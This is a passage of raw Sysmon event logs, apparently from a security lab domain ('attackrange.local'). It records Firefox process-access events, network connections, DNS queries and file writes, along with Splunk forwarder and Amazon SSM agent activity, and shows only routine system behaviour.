Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.7.27526959C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.133{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65499- 10341000x8000000000000000105367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.127{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51741-false44.235.94.69ec2-44-235-94-69.us-west-2.compute.amazonaws.com443https 354300x8000000000000000105365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.046{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51744-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 10341000x8000000000000000105364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.067{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.052{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.052{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.036{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.034{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.014{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.014{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.014{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=E6E7AA2D369248735F6E12FB9D4D2310,SHA256=9BB506EBA962634B55044BFEC9E626BDAB1357460204123D72A291C320D69146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.014{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=ECC786A2D5155AD8D940B4CD35EB0D87,SHA256=C459715BF6BB04AFFCA22EC7BA17C09F9FA3D5CCF44E8B344772ABE21AFBD084,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.014{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.999{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082820Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:32.089{2FDD8D40-B427-615A-7B01-00000000FD01}8001156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082837Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.323{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9FEF001805F9EB4AEA1530503179E60,SHA256=3B221119961C2990B70F75B8D639FC06E82AC4077BD62EDFE1275AFD7621D3AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.999{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-031MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.931{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=787E99B607D39802555132DC65CDB46D,SHA256=01CE6B32DC27DD746A8C6871263AF9B7EBD52B73410E45DF416B0B9D5372EA35,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.048{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51494- 354300x8000000000000000105643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.034{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51768-false13.32.29.34server-13-32-29-34.fra56.r.cloudfront.net443https 354300x8000000000000000105642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.033{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51814- 354300x8000000000000000105641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.032{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65464- 354300x8000000000000000105640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.022{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51767-false35.227.207.240240.207.227.35.bc.googleusercontent.com443https 354300x8000000000000000105639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.022{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49677- 354300x8000000000000000105638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.962{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51765-false34.209.200.8ec2-34-209-200-8.us-west-2.compute.amazonaws.com443https 22542200x8000000000000000105637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.411{58E9C193-B422-615A-0602-00000000FC01}5552djvbdz1obemzo.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.401{58E9C193-B422-615A-0602-00000000FC01}5552reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.400{58E9C193-B422-615A-0602-00000000FC01}5552e11847.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 22542200x8000000000000000105633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.399{58E9C193-B422-615A-0602-00000000FC01}5552djvbdz1obemzo.cloudfront.net052.222.239.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.398{58E9C193-B422-615A-0602-00000000FC01}5552e11847.g.akamaiedge.net095.100.210.81;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.398{58E9C193-B422-615A-0602-00000000FC01}5552reddit.map.fastly.net0199.232.137.140;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program 